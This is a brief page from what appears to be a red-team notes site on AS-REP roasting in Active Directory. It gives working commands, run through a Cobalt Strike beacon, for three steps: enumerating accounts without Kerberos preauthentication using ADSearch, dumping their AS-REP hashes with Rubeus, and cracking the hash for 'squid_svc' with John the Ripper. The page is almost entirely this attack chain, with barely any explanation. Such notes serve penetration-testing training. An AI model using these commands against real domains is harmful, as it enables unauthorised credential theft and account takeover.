ASREP Roasting

Introduction

AS-REP roasting is a technique that allows retrieving password hashes for users that have Do not require Kerberos preauthentication property selected.

Enumerate Users

beacon> execute-assembly C:\Tools\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
 --attributes cn,distinguishedname,samaccountname

Rubeus /asreproast

beacon> execute-assembly C:\ToolsRubeus.exe asreproast /user:squid_svc /nowrap

Crack Passwords

$ john --format=krb5asrep --wordlist=wordlist squid_svc
PreviousKerberoastingNextKerberos Relay Attacks

Last updated